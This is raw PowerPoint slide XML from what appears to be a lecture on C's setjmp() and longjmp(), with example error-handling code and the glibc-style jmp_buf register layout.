              <a:t>" that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>restores the program state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() call saves the context of a program in a data structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When used to save the environment, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) returns 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() call restores the context of the program to its original state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjump(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is called, it is as if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) returned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This mechanism can be used to perform exception/error handling and to implement user-space threading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2704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77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77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77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77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77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77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77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83" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>setjmp() and longjmp()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099784" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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argc</a:t>
            </a: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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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jmp_buf</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env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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 != 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>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"i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= %d\n",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a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    exit(0);</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else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>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"i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= %d\n",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a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    f1(</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099785" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</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f2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</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e</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if (check == error)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longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(e, ERROR2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    /* unreachable */</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else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</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f1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</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e</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if (check == error)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longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(e, ERROR1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    /* unreachable */</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else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    f2(e);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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65498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97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978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978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978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978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978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978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978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9978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978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978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99784">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99784">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99785">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99785">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99785">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9978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99785">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99785">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9785">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99785">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99785">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99785">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99785">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99785">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99785">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99785">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>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99785">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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9978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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>jmp_buf Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1101829" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>typedef</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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[6];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_BX  0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_SI  1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_DI  2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_BP  3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_SP  4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_PC  5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_SIZE 24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/* Calling environment, plus possibly a saved signal mask.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>typedef</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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf_tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;      /* Calling environment.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mask_was_saved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;    /* Saved the signal mask? */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sigset_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>saved_mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>; /* Saved signal mask.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
